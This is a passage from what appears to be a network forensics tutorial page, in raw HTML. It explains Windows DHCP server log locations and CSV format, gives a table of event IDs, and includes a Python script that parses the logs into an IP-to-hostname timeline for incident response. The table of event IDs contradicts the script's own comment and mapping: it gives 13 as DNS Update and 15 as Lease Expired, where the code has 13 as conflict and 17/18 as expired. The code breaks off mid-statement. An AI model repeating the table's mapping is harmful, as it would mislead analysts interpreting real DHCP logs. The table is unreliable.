With DHCP logs, <code>10.10.5.42</code> becomes <code>LAPTOP-JSMITH</code> with MAC address <code>00:1A:2B:3C:4D:5E</code>, immediately correlating to a specific user and device in your asset inventory.</p>\n<p>DHCP logs are the <strong>IP-to-identity translation layer</strong> that makes all other network forensic data actionable.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"32-windows-dhcp-server-log-format\">3.2 Windows DHCP Server Log Format<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#32-windows-dhcp-server-log-format\" class=\"hash-link\" aria-label=\"Direct link to 3.2 Windows DHCP Server Log Format\" title=\"Direct link to 3.2 Windows DHCP Server Log Format\" translate=\"no\">​</a></h3>\n<p>Windows DHCP Server maintains daily rotating log files at:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\dhcp\\DhcpSrvLog-Mon.log</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\dhcp\\DhcpSrvLog-Tue.log</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">...</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\dhcp\\DhcpSrvLog-Sun.log</span><br></span></code></pre></div></div>\n<p>Each line is CSV-formatted:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 
16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ID,Date,Time,Description,IP Address,Host Name,MAC Address,User Name,...</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">10,11/15/25,02:31:04,Assign,10.10.5.42,LAPTOP-JSMITH,00-1A-2B-3C-4D-5E,,0...</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">11,11/15/25,02:31:04,Renew,10.10.5.42,LAPTOP-JSMITH,00-1A-2B-3C-4D-5E,,0...</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">12,11/15/25,10:44:17,Release,10.10.5.42,LAPTOP-JSMITH,00-1A-2B-3C-4D-5E,,0...</span><br></span></code></pre></div></div>\n<p><strong>Key Event IDs in DHCP logs:</strong></p>\n<table><thead><tr><th>ID</th><th>Description</th><th>Forensic Significance</th></tr></thead><tbody><tr><td>10</td><td>Assign</td><td>New lease: device appeared on network at this time</td></tr><tr><td>11</td><td>Renew</td><td>Lease renewal: device still active</td></tr><tr><td>12</td><td>Release</td><td>Client gracefully released IP: clean shutdown</td></tr><tr><td>13</td><td>DNS Update</td><td>DHCP registered DNS A record on behalf of client</td></tr><tr><td>14</td><td>DNS Update Failed</td><td>DNS dynamic update failed: may indicate DNS manipulation</td></tr><tr><td>15</td><td>Lease Expired</td><td>Client dropped off without releasing: crash, abrupt disconnect</td></tr><tr><td>24</td><td>IP Address in Use</td><td>Conflict: potentially unauthorized static IP 
or spoofed MAC</td></tr><tr><td>25</td><td>IP Address Deleted</td><td>Lease manually deleted by admin</td></tr><tr><td>50-59</td><td>IPv6 equivalents</td><td>Same semantics, IPv6 addresses</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"33-parsing-dhcp-logs-for-ip-to-host-correlation\">3.3 Parsing DHCP Logs for IP-to-Host Correlation<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#33-parsing-dhcp-logs-for-ip-to-host-correlation\" class=\"hash-link\" aria-label=\"Direct link to 3.3 Parsing DHCP Logs for IP-to-Host Correlation\" title=\"Direct link to 3.3 Parsing DHCP Logs for IP-to-Host Correlation\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#!/usr/bin/env python3</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Parse all Windows DHCP server log files in a directory.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Builds a time-aware IP-to-hostname mapping for correlation 
with</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">other forensic artifacts during incident response.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> os</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> csv</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> glob</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> datetime </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> datetime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> collections </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> defaultdict</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">DHCP_EVENT_TYPES </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'10'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Assign'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'11'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Renew'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'12'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Release'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Remaining IDs follow the Microsoft DHCP server audit log numbering: 13 conflict, 16 deleted, 17/18 expired, 30/31 DNS update</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'13'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'IP_Conflict'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'16'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Lease_Deleted'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'17'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Lease_Expired'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'18'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Lease_Expired'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'30'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'DNS_Update'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'31'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'DNS_Update_Failed'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">parse_dhcp_logs</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_dir</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    Parse all DhcpSrvLog-*.log files in directory.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    Returns list of lease events sorted by timestamp.</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    \"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    log_files </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> glob</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">glob</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">os</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">join</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_dir</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'DhcpSrvLog-*.log'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> log_file </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> log_files</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_file</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'r'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> encoding</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'utf-8'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> errors</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'replace'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            
</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> line </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                line </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Skip header lines and comments</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> line </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ID'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span 
class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Microsoft'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> \\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                   line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Start'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">or</span><span class=\"token plain\"> line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'Date'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token 
plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                parts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">split</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">','</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">7</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                event_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> event_id </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> DHCP_EVENT_TYPES</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">try</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    date_str </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">1</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    time_str </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> parts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    timestamp </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strptime</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">date_str</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">time_str</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"%m/%d/%y %H:%M:%S\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">except</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ValueError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> IndexError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\">   timestamp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\">  DHCP_EVENT_TYPES</span><span 